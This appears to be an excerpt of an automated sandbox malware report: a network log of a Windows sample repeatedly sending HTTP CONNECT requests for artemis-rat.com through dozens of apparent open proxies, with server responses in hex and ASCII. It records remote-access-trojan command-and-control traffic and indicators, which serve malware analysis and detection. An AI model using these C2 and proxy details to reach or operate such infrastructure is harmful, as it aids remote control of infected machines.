                                              Mar 11, 2024 08:37:19.530978918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              595192.168.2.451678123.30.154.17177777284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.536503077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.898277044 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.10.3 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              596192.168.2.451948203.24.109.230807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.541203976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.695384026 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              597192.168.2.451738164.77.240.279997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.543282032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.194324017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.257213116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.881128073 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              598192.168.2.451953185.162.231.254807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.543433905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.698230028 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              599192.168.2.45169291.134.140.160564957284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.568170071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.366216898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.553881884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.741466999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054543018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362745047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.663515091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.163543940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.163177013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              600192.168.2.451683139.59.1.1480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.568571091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.940282106 CET28INHTTP/1.1 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              601192.168.2.45179972.217.216.23941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.568789005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              602192.168.2.45179424.249.199.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.568830967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              603192.168.2.451959104.16.108.204807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.569022894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.723643064 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              604192.168.2.45182698.162.25.1641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.572463989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              605192.168.2.451880146.19.106.191123347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.572741032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              606192.168.2.45183198.178.72.21109197284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.575870037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              607192.168.2.45183972.210.252.13741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.577223063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              608192.168.2.45188638.162.23.15531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.578497887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.026875973 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              609192.168.2.45189438.162.23.18431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.579634905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.027144909 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              610192.168.2.45185172.206.181.10341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.585238934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              611192.168.2.45175784.39.112.14431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.599402905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.911184072 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.2
                                              Date: Mon, 11 Mar 2024 07:36:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              612192.168.2.45187998.188.47.13241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.602637053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              613192.168.2.45195652.73.224.5431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.606353045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.822959900 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              614192.168.2.45180843.129.228.4678907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.613795996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.911829948 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              615192.168.2.452021172.67.36.21807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.614504099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.768812895 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              616192.168.2.451748103.23.100.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.615103006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              617192.168.2.45175431.170.22.12710807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.619190931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              618192.168.2.451756111.90.150.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.625324011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              619192.168.2.451727203.112.134.7456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.625821114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              620192.168.2.45175547.236.252.2188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.625993013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              621192.168.2.45178945.233.2.141537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.635658026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              622192.168.2.452062104.27.15.161807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.635698080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.789978027 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              623192.168.2.452068185.162.229.112807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
